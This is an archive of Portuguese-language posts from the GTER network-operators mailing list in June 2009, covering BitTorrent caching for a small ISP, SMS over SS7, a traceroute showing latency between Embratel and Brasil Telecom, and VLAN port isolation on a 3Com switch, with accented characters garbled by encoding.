15:40:12 2009 From: fabriciofx at gmail.com (=?ISO-8859-1?Q?Fabr=EDcio_Cabral?=) Date: Thu, 25 Jun 2009 15:40:12 -0300 Subject: [GTER] Cache de BitTorrent In-Reply-To: <5e00a4be0906241105k569ed888j8fe2e6abdc07222c@mail.gmail.com> References: <5e00a4be0906241105k569ed888j8fe2e6abdc07222c@mail.gmail.com> Message-ID: <4c2fd84e0906251140ga93719bid1d1245eb2c8a081@mail.gmail.com> 2009/6/24 Provedor Bogus : > ? ? ?Assim, somos um provedor pequeno do interior do estado do Rio de > Janeiro e desenvolvemos uma solu??o de cache > ? ? ?transparente para BitTorrent (futuramente servir? tamb?m para a rede > eDonkey). N?o gostar?amos de nos identificar > ? ? ?porque ainda estamos levantando os aspectos jur?dicos da proposta que > trazemos e contaremos tamb?m com as > ? ? ?respostas de outros interessados para formular nossa forma de > funcionamento. Os aspecto jur?dico vai depender de como o seu cache funciona. Assim, voc? poderia explicar *detalhamente* como ele funciona? > ? ? ?Sobre o c?digo desenvolvido, o cache funciona perfeitamente, ? > escalon?vel, pode ser dividido em v?rias m?quinas para > ? ? ?quest?es de alta disponibilidade e consome pouca CPU podendo ser > executado numa m?quina Linux com 16 GB de RAM > ? ? ?e aconselhamos um processador Core i7 b?sico. > ? ? ?Nossa m?quina de produ??o tem exatamente essa configura??o e custou > cerca de R$ 2.800 com placa-m?e Supermicro. Cache "normalmente" consome mais disco e ram do que CPU. Cache P2P ? um caso a parte, se for levado em considera??o de *como* voc? est? fazendo o reconhecimento desse tr?fego. Se for an?lise de payload, com certeza ele vai consumir muita CPU (obviamente, tamb?m depende da quantidade de tr?fego). > ? ? ?O problema atual ? que possu?mos pouco volume de tr?fego para popular > o cache e com isso o hit ratio alcan?ado fica em > ? ? ?torno de 6%, sendo que o desej?vel ? qualquer coisa acima de 35%. N?o entendi direito essa dificuldade de popular o cache. Para o hit ratio ficar baixo assim, s? se houverem muitos usu?rios de P2P baixando conte?dos diferentes (sempre novos) e poucos baixando conte?dos populares, o que soa meio estranho. Quanto de disco o seu cache est? consumindo? Qual pol?tica de replacement voc? est? utilizando? Como funciona *exatamente* o seu cache? > ? ? ?A id?ia ? que outros provedores (fora do Rio de Janeiro, por quest?es > de mercado) tamb?m possuam uma m?quina de > ? ? ?cache que ir? compartilhar o nosso servidor de conte?do (que ? uma > m?quina com 4 processadores Quad-Xeon > ? ? ?e 64 GB de RAM) de 45 TB. O modelo de neg?cios s? fica interessante se > pudermos utilizar um link de Internet mais > ? ? ?barato do que os contratados das carriers e por isso os interessados > dever?o estar conectados ao NAP das Am?ricas > ? ? ?na Terremark. Espera-se com isso baixar o custo de link para o tr?fego > P2P sem diminuir a qualidade para o usu?rio > ? ? ?final. Infelizmente, n?o posso ajudar nisso... :( > ? ? ?Se algu?m estiver interessado em participar disso, por favor, envie > uma mensagem privada. Bom, eu tenho um certo know-how de caching P2P... querendo trocar umas id?ias, estou a disposi??o! :) []?s -- --fx From igiangrossi at yahoo.com Thu Jun 25 23:57:15 2009 From: igiangrossi at yahoo.com (Igor Giangrossi) Date: Thu, 25 Jun 2009 19:57:15 -0700 (PDT) Subject: [GTER] RES: Iran In-Reply-To: <4A43F404.9020304@jarruda.com> References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> <4A43F404.9020304@jarruda.com> Message-ID: <962733.67838.qm@web33107.mail.mud.yahoo.com> V?rias operadoras m?veis usam transporte de SS7 sobre IP. Segue um link da Cisco com alguns whitepapers que descrevem a id?ia b?sica e os encapsulamentos utilizados: http://www.cisco.com/en/US/products/sw/wirelssw/ps1862/index.html []s Igor ----- Original Message ---- From: Julio Arruda To: Grupo de Trabalho de Engenharia e Operacao de Redes Sent: Thursday, June 25, 2009 7:02:44 PM Subject: Re: [GTER] RES: Iran Marcus Andree wrote: > nao entendi o que voce quis dizer por "central" e "centrais de comutacao". > A telefonia celular opera de forma bastante diferente da telefonia fixa. Onde se le, central/centrais de comutacao, presumo que ele quer dizer os MSCs (ou o que tenha substituido isto). > > Claro que ha excecoes e algumas evolucoes do SMS, mas, na ideia > como foi concebida, ele funciona utilizando apenas a rede de controle, > via protocolo SS7. Acho que os exemplos que o pessoal esta falando, e' que em algum 'momento' no caminho, o que chegou do telefone celular em "SMS" que e' sobre SS7, vira algo diferente.. Eu lembro vagamente dos AIN e etc, acho que de qualquer forma, normalmente isto estaria viajando em SS7, e possivelmente algumas empresas poderiam estar usando os tais gateways, mas 'fim a fim', parece ser SS7 do mesmo jeito :-).. Eu cheguei a trabalhar um pouco com os chamados STPs (USP em NT-speak), e eles tinham opcao de fazer IPS7, que era SS7 em IP. > > 2009/6/25 Giovane Heleno : >> Mas, uma vez dentro da central, o SMS ? comutado para outras centrais >> de comuta??o, ou ela ? enviada para alguma plataforma diretamente? >> O SS7 tem suporte a isso? >> >> Abra?os, >> >> Giovane Heleno >> >> >> 2009/6/25 Marcus Andree : >>> O SMS nao usa canal de voz na comunicacao entre o aparelho e >>> a ERB. Usa apenas uma "banda excedente" do canal de controle. >>> >>> Isso explica como e' possivel receber um SMS enquanto o usuario >>> esta' numa chamada de voz. >>> >>> Uma vez na rede GSM, a informacao trafega via SS7. Em muitos >>> pontos da rede SS7, existem equipamentos "gateway" que podem >>> receber informacao via IP e gerar trafego SS7 a partir dessa informacao >>> recebida. Um exemplo "classico" e' o proprio SMS.... >>> >>> Ha uma RFC descrevendo como seria uma comunicacao SS7 "via" >>> links IP. Esta parece ser uma tendencia num futuro nao muito distante. >>> >>>> O SS7 ? utilizado em comunica??es entre centrais, sinaliza??o e >>>> controle das rotas e canais de voz, e o trafego SMS n?o ? roteado >>>> pelos canais de voz. >>>> >>>> Agora, se usa IP, a? n?o sei mesmo... >>>> >>>> Se eu estiver enganado, me avisem... ? bom ficar sempre atualizado. >>>> >>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >>> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter -- gter list https://eng.registro.br/mailman/listinfo/gter From provedorbogus at gmail.com Thu Jun 25 17:32:22 2009 From: provedorbogus at gmail.com (Provedor Bogus) Date: Thu, 25 Jun 2009 17:32:22 -0300 Subject: [GTER] RES: Cache de BitTorrent In-Reply-To: <3A3FEDF0BB48484B8DB2DD8F901F119F@toledoPC> References: <5e00a4be0906241105k569ed888j8fe2e6abdc07222c@mail.gmail.com> <86b352050906250557p1eb5dbbby587e8337dff8ae12@mail.gmail.com> <5e00a4be0906250801k996f3dby68e38b410a49c7fe@mail.gmail.com> <3A3FEDF0BB48484B8DB2DD8F901F119F@toledoPC> Message-ID: <5e00a4be0906251332q744c0ebanad2895e4bf0cdf17@mail.gmail.com> Luis, O problema n?o s?o os boxes. As m?quinas s?o baratas, tanto a m?quina de cache quanto a m?quina de conte?do podem ser m?quinas modestas. N?s compramos uma m?quina de conte?do (Dell MD1000 + PowerEdge) mais potente porque esper?vamos uma demanda diferente da que tivemos, mas, ela foi hiperdimensionada. O grande problema da solu??o ? o volume de tr?fego, que precisa ser significativo. Quanto maior o tr?fego, maior o hit ratio. Um provedor que tenha 50 mbps de tr?fego Torrent n?o conseguir? mais que 2% de hit ratio. :-( Eu esperava que o interesse dos provedores fosse at? maior. Pouca gente me escreveu, talvez pela situa??o de termos facilidade no PTT da Terremark ao inv?s do PTT-Metro, mas, se a id?ia dos PTT-R comecasse a virar realidade, isso seria com toda certeza, um grande diferencial para o backbone brasileiro. Um abra?o ! 2009/6/25 Toledo, Luis Carlos > > Uma op??o j? q o custo dos boxes s?o caros, e a aquisi??o em forma de > cons?rcio ou associa??o, sendo cada cotista investi um quinh?o e tem > direito > a parte do uso > > > > > Ant?nio, > > > > A sua sugest?o ? excelente. O problema ? que inicialmente > > isso n?o seria um produto porque somos um provedor como > > outros aqui e com a mesma necessidade de baixar o custo do > > P2P. Como j? estamos linkados na Terremark a coisa fica mais > > f?cil e r?pida de ser botada em pr?tica. Se a coisa tomar > > vulto, podemos hospedar um servidor de conte?do tamb?m no PTT > > Metro e un?-los. > > > > Um abra?o ! > > > > > > 2009/6/25 Antonio Carlos Pina > > > > > Sugiro que voc? avalie a possibilidade de tamb?m se conectar ao > > > PTT-Metro ( www.ptt.br). > > > > > > Conectando-se unicamente a Terremark voc? acaba restringindo seu > > > alcance com o produto. > > > Abs > > > 2009/6/24 Provedor Bogus > > > > > > > Caros colegas, > > > > > > > > Primeiramente pe?o desculpas se essa n?o ? a melhor > > lista para > > > tratar > > > > deste assunto. > > > > > > > > H? algum tempo consultamos empresas (PeerApp e > > Oversi) sobre o > > > > custo de implanta??o de um cache de P2P e nos > > > > assustamos com o custo do hardware e principalmente do > > > > software, completamente invi?veis para qualquer empresa > > > > de pequeno e m?dio porte s? sendo justific?vel para carriers. > > > > > > > > Assim, somos um provedor pequeno do interior do > > estado do Rio > > > > de Janeiro e desenvolvemos uma solu??o de cache > > > > transparente para BitTorrent (futuramente servir? > > tamb?m para a > > > > rede eDonkey). N?o gostar?amos de nos identificar > > > > porque ainda estamos levantando os aspectos jur?dicos da > > > > proposta > > > que > > > > trazemos e contaremos tamb?m com as > > > > respostas de outros interessados para formular nossa > > forma de > > > > funcionamento. > > > > > > > > Sobre o c?digo desenvolvido, o cache funciona > > perfeitamente, ? > > > > escalon?vel, pode ser dividido em v?rias m?quinas para > > > > quest?es de alta disponibilidade e consome pouca CPU podendo > > > > ser executado numa m?quina Linux com 16 GB de RAM > > > > e aconselhamos um processador Core i7 b?sico. > > > > Nossa m?quina de produ??o tem exatamente essa configura??o e > > > > custou cerca de R$ 2.800 com placa-m?e Supermicro. > > > > > > > > O problema atual ? que possu?mos pouco volume de tr?fego para > > > popular > > > > o cache e com isso o hit ratio alcan?ado fica em > > > > torno de 6%, sendo que o desej?vel ? qualquer coisa > > acima de 35%. > > > > > > > > Por isso estamos recorrendo a esta lista. > > > > > > > > A id?ia ? que outros provedores (fora do Rio de Janeiro, por > > > quest?es > > > > de mercado) tamb?m possuam uma m?quina de > > > > cache que ir? compartilhar o nosso servidor de > > conte?do (que ? > > > > uma m?quina com 4 processadores Quad-Xeon > > > > e 64 GB de RAM) de 45 TB. O modelo de neg?cios s? fica > > > > interessante > > > se > > > > pudermos utilizar um link de Internet mais > > > > barato do que os contratados das carriers e por isso os > > > > interessados dever?o estar conectados ao NAP das Am?ricas > > > > na Terremark. Espera-se com isso baixar o custo de > > link para o > > > tr?fego > > > > P2P sem diminuir a qualidade para o usu?rio > > > > final. > > > > > > > > Se algu?m estiver interessado em participar disso, > > por favor, > > > > envie uma mensagem privada. > > > > > > > > Atenciosamente, > > > > > > > > Provedor Bogus > > > > -- > > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > > -- > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From luizgustavo at luizgustavo.pro.br Thu Jun 25 16:08:50 2009 From: luizgustavo at luizgustavo.pro.br (Luiz Gustavo S. Costa) Date: Thu, 25 Jun 2009 16:08:50 -0300 Subject: [GTER] =?iso-8859-1?q?lentid=E3o_globo=2Ecom?= Message-ID: <772ca7d0906251208h69ed3dc1wf314ab29cd05da48@mail.gmail.com> Eai galera, temos problema de congestionamento para o site do globo.com (principalmente video) ? ser? que por causa da transmiss?o ao vivo do jogo do Brasil ??? eu to sentindo aqui via GVT... e voc?s, tem noticia ? abra?os -- Luiz Gustavo Costa mundoUnix - Consultoria em Software Livre http://www.mundounix.com.br ICQ: 2890831 / MSN: gustavo.bsd at gmail.com From tecwave at tecwave.com.br Thu Jun 25 16:10:19 2009 From: tecwave at tecwave.com.br (Alexandre Martini - Tecwave) Date: Thu, 25 Jun 2009 16:10:19 -0300 Subject: [GTER] Latencia alta entre Embratel e Brasil Telecom In-Reply-To: <6bb5f5b10906251150s509f5f2bqb76f94b20928583d@mail.gmail.com> References: <6bb5f5b10906251150s509f5f2bqb76f94b20928583d@mail.gmail.com> Message-ID: <4A43CB9B.6040206@tecwave.com.br> Eu tenho notado, pois hoje tive q fazer um suporte remoto a um provedor q tem link Embratel, a partir de meu link BRT, conex?o via protocolo VNC muito inst?vel e com v?rias travadas. Estou no interior do RS. Rubens Kuhl escreveu: > Estamos notando uma lat?ncia muito alta de tr?fego indo da Embratel > para a Brasil Telecom: > > > 4 9 ms 7 ms 9 ms embratel-G0-3-nacc02.soc.embratel.net.br > [189.86.100.1] > 5 10 ms 9 ms 11 ms 200.230.247.2 > 6 11 ms 11 ms 11 ms ebt-P1-1-0-core03.spo.embratel.net.br > [200.244.140.230] > 7 12 ms 11 ms 18 ms ebt-C1-gacc03.spomb.embratel.net.br > [200.230.242.142] > 8 300 ms 300 ms 303 ms peer-P4-3-gacc03.spomb.embratel.net.br > [200.211.219.170] > 9 334 ms 339 ms 346 ms BrT-G7-1-spopa302.brasiltelecom.net.br > [201.10.241.150] > > Algu?m mais notou algum efeito ex?tico como este ? > > > Rubens > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- []s Alexandre Martini Tecwave Internet :: http://www.tecwave.com.br :: From rickmarx at globo.com Thu Jun 25 15:38:57 2009 From: rickmarx at globo.com (Sergio Ricardo Marques) Date: Thu, 25 Jun 2009 15:38:57 -0300 Subject: [GTER] =?iso-8859-1?q?Virtua_n=E3o_acessa_v=E1rios_sites?= References: <4A416583.8070600@jarruda.com><4A4282CC.2070508@jarruda.com> Message-ID: <011E245D38514877B146B8AAF2D6261B@ricardookh> Boa tarde! Recebi v?rias reclama??es de clientes que n?o conseguem ver os seus sites/e-mails, todos utilizando Net V?rtua. Nas minhas duas conex?es, uma virtua e outra speedy, eu vejo normalmente. Algu?m est? tendo o mesmo problema para acesso externo? Aqui eu n?o consigo acessar o www.abusar.org e o www.wikipedia.org. Grato. Sergio. From mauriciobentoghem at gmail.com Thu Jun 25 21:17:17 2009 From: mauriciobentoghem at gmail.com (Mauricio Bento Ghem) Date: Thu, 25 Jun 2009 21:17:17 -0300 Subject: [GTER] Gerador de Pacotes Message-ID: Ol? Pessoal, Um pouco off-topic, portanto, qualquer coisa descartem a mensagem. Estou trabalhando em cima do TCC e tenho a necessidade de gerar pacotes RTP (e RTCP) atrav?s de uma rede. Posso rodar uma aplica??o para obter estes pacotes (videoconfer?ncia por exemplo), mas eu gostaria de poder fazer um * tweak* neste pacote. Se algu?m souber um simulador, uma API ou similar que d? conta do recado, agrade?o. Att, Maur?cio. -- Maur?cio Bento Ghem Website: www.bentow.com.br Email: mauriciobentoghem at gmail.com Home Phone: +55 (51) 3524-9192 Mobile Phone: +55 (51) 8146-8553 Skype: mauriciobentow From alfredo.dalava at gmail.com Thu Jun 25 15:38:36 2009 From: alfredo.dalava at gmail.com (=?ISO-8859-1?Q?Alfredo_Dal=B4Ava_J=FAnior?=) Date: Thu, 25 Jun 2009 15:38:36 -0300 Subject: [GTER] RES: RES: Iran In-Reply-To: References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> Message-ID: Vamos supor que se jogue uma bomba no PPT SP e que o governo "tome controle" do dia para a noite da Embratel, Telefonica e Oi, vc ja parou uns 95% da rede, acredito eu. Pode at? ter redund?ncia, mas os links internacionais devem estar concentrados em 3 ou 4 cidades. A internet por sat?lite s? vai funcionar se a base dela estiver em outro pa?s, pq se a base estiver no brasil, ja era tamb?m. E BGP s?o poucos provedores que t?m... troca de trafego ent?o d? pra contar nos dedos. Aos que conhecem melhor a internet no brasil, ? mais ou menos isso ou estou muito por fora? []'s Alfredo 2009/6/24 Renato Frederick > Levando o assunto para outro lado, desculpe se ficar offtopic, mas lendo o > asert me vem a d?vida: > > No dia atual ? poss?vel isolar efetivamente uma localidade de acesso total > para a Internet? > > Imagino que no caso Brasil em que trocamos tr?fego com v?rios provedores > Internacionais por diversos provedores locais, uma manobra no BGP de todos > os provedores, deixando de receber AS's e publicando d? conta do recado. > > Em pa?ses em que o governo ? o ?nico respons?vel pelo provimento de > Internet ou links internacionais, como era Embratel no Brasil a anos, fica > mais f?cil ainda. > > Por?m, como fica acesso Internet via Sat?lite? Quando um regime opressivo > tamb?m tira TV's fora do ar, canais de sat?lite pegos com parab?lica com ou > banda Ku continuariam a funcionar - me corrijam se estive errado - bem como > acesso Internet. > > Enfim, felizmente todos os parentes e amigos que tenho n?o vivem em pa?ses > com este tipo de governo, ent?o n?o tenho a m?nima id?ia de como ? e de > 'jeitinho' para contornar, claro podendo pagar com a pr?pria cabe?a. > > > > > > > -----Mensagem original----- > > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > > Em nome de Julio Arruda > > Enviada em: quarta-feira, 24 de junho de 2009 16:47 > > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > > Assunto: Re: [GTER] RES: Iran > > > > Toledo, Luis Carlos wrote: > > > S? esqueceu de mencionar o flood gigantesco de SMS enviado +- duas > > horas > > > depois do encerramento da elei??o, logo ap?s houve o bloqueio. > > > > > > > Uma curiosidade aidicional > > Em ao menos um pais do Caribe, onde a alguns anos tiveram uns atentados > > a bomba, a rede SS7 dos celulares deu umas 'quedas'.. > > > > O problema foi relacionado com a quantidade de pessoas ligando ao mesmo > > tempo, da capital, de uma regiao especifica. > > > > Redes SS7, no meu parco conhecimento, apesar de muito robustas, sao > > muito 'estaticas', e se nao forem dimensionadas para tratar estes > > 'eventos anormais', nao seguram o rojao. > > > > SMS, pelo que sei, nao trafega sobre IP, e sim sobre SS7 ? > > > > > > >> Recentemente os malucos..errr..pesquisadores la do asert > > >> publicaram alguns artigos sobre Iran e etc.. > > >> http://asert.arbornetworks.com/ > > >> > > >> -- > > >> gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > -- > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- []'s Alfredo Yogi Berra - "I never said most of the things I said." From mauriciobentoghem at gmail.com Thu Jun 25 18:15:55 2009 From: mauriciobentoghem at gmail.com (Mauricio Bento Ghem) Date: Thu, 25 Jun 2009 18:15:55 -0300 Subject: [GTER] RES: Iran In-Reply-To: <4A43D7AB.2070607@jarruda.com> References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> <4A43D7AB.2070607@jarruda.com> Message-ID: 2009/6/25 Julio Arruda > Mauricio Bento Ghem wrote: > >> Falando nisso, o blog http://asert.arbornetworks.com/ est? baleado. N?o >> consegui mais acess?-lo. >> >> > Daqui esta entrando, nao sei se pode ser algo 'localizado'.. > Alguem devia ter feito alguma modifica??o no c?digo php, estava dando problema no script. Isto ocorreu pelas 13:30. > > > 2009/6/25 Marcus Andree >> >> O SMS nao usa canal de voz na comunicacao entre o aparelho e >>> a ERB. Usa apenas uma "banda excedente" do canal de controle. >>> >>> Isso explica como e' possivel receber um SMS enquanto o usuario >>> esta' numa chamada de voz. >>> >>> Uma vez na rede GSM, a informacao trafega via SS7. Em muitos >>> pontos da rede SS7, existem equipamentos "gateway" que podem >>> receber informacao via IP e gerar trafego SS7 a partir dessa informacao >>> recebida. Um exemplo "classico" e' o proprio SMS.... >>> >>> Ha uma RFC descrevendo como seria uma comunicacao SS7 "via" >>> links IP. Esta parece ser uma tendencia num futuro nao muito distante. >>> >>> O SS7 ? utilizado em comunica??es entre centrais, sinaliza??o e >>>> controle das rotas e canais de voz, e o trafego SMS n?o ? roteado >>>> pelos canais de voz. >>>> >>>> Agora, se usa IP, a? n?o sei mesmo... >>>> >>>> Se eu estiver enganado, me avisem... ? bom ficar sempre atualizado. >>>> >>>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >>> >>> >> >> >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- Maur?cio Bento Ghem Website: www.bentow.com.br Email: mauriciobentoghem at gmail.com Home Phone: +55 (51) 3524-9192 Mobile Phone: +55 (51) 8146-8553 Skype: mauriciobentow From webgeo at gmail.com Thu Jun 25 19:08:32 2009 From: webgeo at gmail.com (Giovane Heleno) Date: Thu, 25 Jun 2009 19:08:32 -0300 Subject: [GTER] RES: Iran In-Reply-To: References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> Message-ID: Trabalhei com EWSD (Siemens) e AXE (Ericsson), centrais de comuta??o de telefonia fixa. N?o cheguei a trabalhar com celular. 2009/6/25 Marcus Andree : > nao entendi o que voce quis dizer por "central" e "centrais de comutacao". > A telefonia celular opera de forma bastante diferente da telefonia fixa. > > Claro que ha excecoes e algumas evolucoes do SMS, mas, na ideia > como foi concebida, ele funciona utilizando apenas a rede de controle, > via protocolo SS7. > > 2009/6/25 Giovane Heleno : >> Mas, uma vez dentro da central, o SMS ? comutado para outras centrais >> de comuta??o, ou ela ? enviada para alguma plataforma diretamente? >> O SS7 tem suporte a isso? >> >> Abra?os, >> >> Giovane Heleno >> >> >> 2009/6/25 Marcus Andree : >>> O SMS nao usa canal de voz na comunicacao entre o aparelho e >>> a ERB. Usa apenas uma "banda excedente" do canal de controle. >>> >>> Isso explica como e' ?possivel receber um SMS enquanto o usuario >>> esta' numa chamada de voz. >>> >>> Uma vez na rede GSM, a informacao trafega via SS7. Em muitos >>> pontos da rede SS7, existem equipamentos "gateway" que podem >>> receber informacao via IP e gerar trafego SS7 a partir dessa informacao >>> recebida. Um exemplo "classico" e' o proprio SMS.... >>> >>> Ha uma RFC descrevendo como seria uma comunicacao SS7 "via" >>> links IP. Esta parece ser uma tendencia num futuro nao muito distante. >>> >>>> >>>> O SS7 ? utilizado em comunica??es entre centrais, sinaliza??o e >>>> controle das rotas e canais de voz, e o trafego SMS n?o ? roteado >>>> pelos canais de voz. >>>> >>>> Agora, se usa IP, a? n?o sei mesmo... >>>> >>>> Se eu estiver enganado, me avisem... ? bom ficar sempre atualizado. >>>> >>> -- >>> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >>> >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From webgeo at gmail.com Thu Jun 25 22:00:43 2009 From: webgeo at gmail.com (Giovane Heleno) Date: Thu, 25 Jun 2009 22:00:43 -0300 Subject: [GTER] RES: Iran In-Reply-To: <4A43F404.9020304@jarruda.com> References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> <4A43F404.9020304@jarruda.com> Message-ID: Interessante a discuss?o... s? n?o estou enxergando como o SS7 transporta o SMS. Pelo que conhe?o, o SS7 ? usado para inicializa??o e controle de chamadas, e n?o transporte. To pesquisando.. to pesquisando.. ehehehehe Giovane Heleno 2009/6/25 Julio Arruda : > Marcus Andree wrote: >> >> nao entendi o que voce quis dizer por "central" e "centrais de comutacao". >> A telefonia celular opera de forma bastante diferente da telefonia fixa. > > Onde se le, central/centrais de comutacao, presumo que ele quer dizer os > MSCs (ou o que tenha substituido isto). > >> >> Claro que ha excecoes e algumas evolucoes do SMS, mas, na ideia >> como foi concebida, ele funciona utilizando apenas a rede de controle, >> via protocolo SS7. > > Acho que os exemplos que o pessoal esta falando, e' que em algum 'momento' > no caminho, o que chegou do telefone celular em "SMS" que e' sobre SS7, vira > algo diferente.. > Eu lembro vagamente dos AIN e etc, acho que de qualquer forma, normalmente > isto estaria viajando em SS7, e possivelmente algumas empresas poderiam > estar usando os tais gateways, mas 'fim a fim', parece ser SS7 do mesmo > jeito :-).. > > Eu cheguei a trabalhar um pouco com os chamados STPs (USP em NT-speak), e > eles tinham opcao de fazer IPS7, que era SS7 em IP. >> >> 2009/6/25 Giovane Heleno : >>> >>> Mas, uma vez dentro da central, o SMS ? comutado para outras centrais >>> de comuta??o, ou ela ? enviada para alguma plataforma diretamente? >>> O SS7 tem suporte a isso? >>> >>> Abra?os, >>> >>> Giovane Heleno >>> >>> >>> 2009/6/25 Marcus Andree : >>>> >>>> O SMS nao usa canal de voz na comunicacao entre o aparelho e >>>> a ERB. Usa apenas uma "banda excedente" do canal de controle. >>>> >>>> Isso explica como e' ?possivel receber um SMS enquanto o usuario >>>> esta' numa chamada de voz. >>>> >>>> Uma vez na rede GSM, a informacao trafega via SS7. Em muitos >>>> pontos da rede SS7, existem equipamentos "gateway" que podem >>>> receber informacao via IP e gerar trafego SS7 a partir dessa informacao >>>> recebida. Um exemplo "classico" e' o proprio SMS.... >>>> >>>> Ha uma RFC descrevendo como seria uma comunicacao SS7 "via" >>>> links IP. Esta parece ser uma tendencia num futuro nao muito distante. >>>> >>>>> O SS7 ? utilizado em comunica??es entre centrais, sinaliza??o e >>>>> controle das rotas e canais de voz, e o trafego SMS n?o ? roteado >>>>> pelos canais de voz. >>>>> >>>>> Agora, se usa IP, a? n?o sei mesmo... >>>>> >>>>> Se eu estiver enganado, me avisem... ? bom ficar sempre atualizado. >>>>> >>>> -- >>>> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >>>> >>> -- >>> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >>> >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter > > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From marcusandree at gmail.com Fri Jun 26 08:36:45 2009 From: marcusandree at gmail.com (Marcus Andree) Date: Fri, 26 Jun 2009 08:36:45 -0300 Subject: [GTER] RES: Iran In-Reply-To: References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> <4A43F404.9020304@jarruda.com> Message-ID: O protocolo SS7 define uma "pilha" completa para roteamento, inclusive com a camada de apresentacao. 2009/6/25 Giovane Heleno : > Interessante a discuss?o... s? n?o estou enxergando como o SS7 transporta o SMS. > Pelo que conhe?o, o SS7 ? usado para inicializa??o e controle de > chamadas, e n?o transporte. > > To pesquisando.. to pesquisando.. ehehehehe > > Giovane Heleno > > > 2009/6/25 Julio Arruda : >> Marcus Andree wrote: >>> >>> nao entendi o que voce quis dizer por "central" e "centrais de comutacao". >>> A telefonia celular opera de forma bastante diferente da telefonia fixa. >> >> Onde se le, central/centrais de comutacao, presumo que ele quer dizer os >> MSCs (ou o que tenha substituido isto). >> >>> >>> Claro que ha excecoes e algumas evolucoes do SMS, mas, na ideia >>> como foi concebida, ele funciona utilizando apenas a rede de controle, >>> via protocolo SS7. >> >> Acho que os exemplos que o pessoal esta falando, e' que em algum 'momento' >> no caminho, o que chegou do telefone celular em "SMS" que e' sobre SS7, vira >> algo diferente.. >> Eu lembro vagamente dos AIN e etc, acho que de qualquer forma, normalmente >> isto estaria viajando em SS7, e possivelmente algumas empresas poderiam >> estar usando os tais gateways, mas 'fim a fim', parece ser SS7 do mesmo >> jeito :-).. >> >> Eu cheguei a trabalhar um pouco com os chamados STPs (USP em NT-speak), e >> eles tinham opcao de fazer IPS7, que era SS7 em IP. >>> >>> 2009/6/25 Giovane Heleno : >>>> >>>> Mas, uma vez dentro da central, o SMS ? comutado para outras centrais >>>> de comuta??o, ou ela ? enviada para alguma plataforma diretamente? >>>> O SS7 tem suporte a isso? >>>> >>>> Abra?os, >>>> >>>> Giovane Heleno >>>> >>>> >>>> 2009/6/25 Marcus Andree : >>>>> >>>>> O SMS nao usa canal de voz na comunicacao entre o aparelho e >>>>> a ERB. Usa apenas uma "banda excedente" do canal de controle. >>>>> >>>>> Isso explica como e' ?possivel receber um SMS enquanto o usuario >>>>> esta' numa chamada de voz. >>>>> >>>>> Uma vez na rede GSM, a informacao trafega via SS7. Em muitos >>>>> pontos da rede SS7, existem equipamentos "gateway" que podem >>>>> receber informacao via IP e gerar trafego SS7 a partir dessa informacao >>>>> recebida. Um exemplo "classico" e' o proprio SMS.... >>>>> >>>>> Ha uma RFC descrevendo como seria uma comunicacao SS7 "via" >>>>> links IP. Esta parece ser uma tendencia num futuro nao muito distante. >>>>> >>>>>> O SS7 ? utilizado em comunica??es entre centrais, sinaliza??o e >>>>>> controle das rotas e canais de voz, e o trafego SMS n?o ? roteado >>>>>> pelos canais de voz. >>>>>> >>>>>> Agora, se usa IP, a? n?o sei mesmo... >>>>>> >>>>>> Se eu estiver enganado, me avisem... ? bom ficar sempre atualizado. >>>>>> >>>>> -- >>>>> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >>>>> >>>> -- >>>> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >>>> >>> -- >>> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From anjunior at gmail.com Fri Jun 26 03:43:16 2009 From: anjunior at gmail.com (Antonio Junior) Date: Fri, 26 Jun 2009 03:43:16 -0300 Subject: [GTER] Port Vlan em Switch 3com In-Reply-To: References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> <4A43F404.9020304@jarruda.com> Message-ID: <000001c9f629$649d6b20$2dd84160$@com> Bom dia pessoal, Gostaria de saber se algu?m pode me ajudar. Pois estou quebrando a cabe?a para fazer o seguinte em um switch 3com l2: Porta 1 ? 24 n?o se comunicam entre si. E todas as portas se comunicam com a 25. Quero fazer apenas untagged vlan, pois quero apenas isolar as portas, e fazer com que eles se comuniquem apenas com o servidor na porta uplink. Se algu?m tiver alguma sugest?o de como fazer agrade?o, pois tentei fazer, por?m n?o consigo adicionar uma porta (uplink) em mais de 2 untagged vlans. Grande abra?o. Att, Antonio Junior From jbl at internexxus.com.br Fri Jun 26 00:49:14 2009 From: jbl at internexxus.com.br (Jefferson B. Limeira) Date: Fri, 26 Jun 2009 00:49:14 -0300 Subject: [GTER] =?iso-8859-1?q?Redund=E2ncia_de_sites?= Message-ID: <1245988154.4a44453af2de6@webmail.internexxus.com.br> Boa Noite Senhores, Venho 